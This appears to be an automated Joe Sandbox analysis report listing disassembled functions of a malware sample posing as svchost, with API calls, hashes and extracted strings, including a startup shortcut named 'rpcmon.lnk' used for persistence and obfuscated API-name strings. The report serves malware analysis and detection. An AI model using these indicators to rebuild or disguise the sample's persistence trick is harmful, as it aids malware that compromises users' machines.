                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69
                                      Function 00415ED1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      Function 0040FB96 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(024020C0), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      Function 0040D6D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      Function 0041627E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      Function 00401180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A
                                      Function 00401200 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A
                                      Function 00413BC9 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      • Opcode ID: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction ID: 47fafc7281d56cd7232f0f11f7b3e10cd24c1ba3464f88fcbebd715b16cd05de
                                      • Opcode Fuzzy Hash: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction Fuzzy Hash: 11112733504211ABCB312FB5AC066DB3B989F453A5B20442BF948A6251EEBCDDC1879D
                                      Function 00410317 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction ID: e4933e4f9cff87b6db1e50e91856c3ef302a7f33dd3041806c411e2e618183a8
                                      • Opcode Fuzzy Hash: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction Fuzzy Hash: D7F0F631940214ABD720FB6699037CE33906F04728F14010FF818E72D2DBFC48C19A5D
                                      Function 00404510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      • Opcode ID: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction ID: 9fc85db481ca541f5af55655987844c855698c76e688db874c41ef445bc3599c
                                      • Opcode Fuzzy Hash: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction Fuzzy Hash: 244176B4A00209EFCB08CF98D5909DEB7F2BF89300F208599E9156B395D735AE41DF99
                                      Function 004077B0 Relevance: 6.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      • Opcode ID: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction ID: a62dec62c92b60b4c519499498a98483a560beb34225c0dd4930cde99cd07262
                                      • Opcode Fuzzy Hash: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction Fuzzy Hash: 7B61B3B5E04208EBDF04DFE4C851BEEBBB1AF88304F148069E9057B381D738AA45DB95
                                      Function 0041527E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: 5b5670c111a8cead40a1ffb16e00d74f18a4a9ed4f14907d396a6f9763220556
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 7E117E3200054EFBCF125E85DC418EE3F22BB89354B598456FE2859131D33AC9B2AB85
                                      Function 0040F051 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 1414122017-0
                                      • Opcode ID: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction ID: 1e2d0527fb0d68fa3bcd4beffa05bed18b15ee7e689a91fba965b1ab2acf346e
                                      • Opcode Fuzzy Hash: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction Fuzzy Hash: 5101473550020A66CB10E757D802AEEBBE99B80358F14007FF400A21D3DB79AA92CA8D
                                      Function 004097F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      • Opcode ID: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction ID: 98ac9bbf1862fee8dd38477f1cb269d12124be3a97ef54141adb3ea9d1f28a8a
                                      • Opcode Fuzzy Hash: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction Fuzzy Hash: AE711C71A00208AFCB14CF98D980BEEB7B1EF45314F20C5AAE859A7381D735AE55CF45
                                      Function 004048E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      • Opcode ID: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction ID: 63a32dae344941abd75bf44d8694bd3729833ffbde521e45b6cf845468b15615
                                      • Opcode Fuzzy Hash: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction Fuzzy Hash: BB41BEB4E04208EFCB08DF99D59099EB7B2FF89304F208169E9556B395C734AE41DF58
                                      Function 004060E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      • Opcode ID: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction ID: d2c120628e0025ae6c47003c0dfc20d879d162270b197ae00e22ec2d328a1bd1
                                      • Opcode Fuzzy Hash: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction Fuzzy Hash: D241FB70D0424ADFCF04CF94C9507BEBBB1BF41309F2581AAD4127B286C379AA65DB95
                                      Function 00409E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      • Opcode ID: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
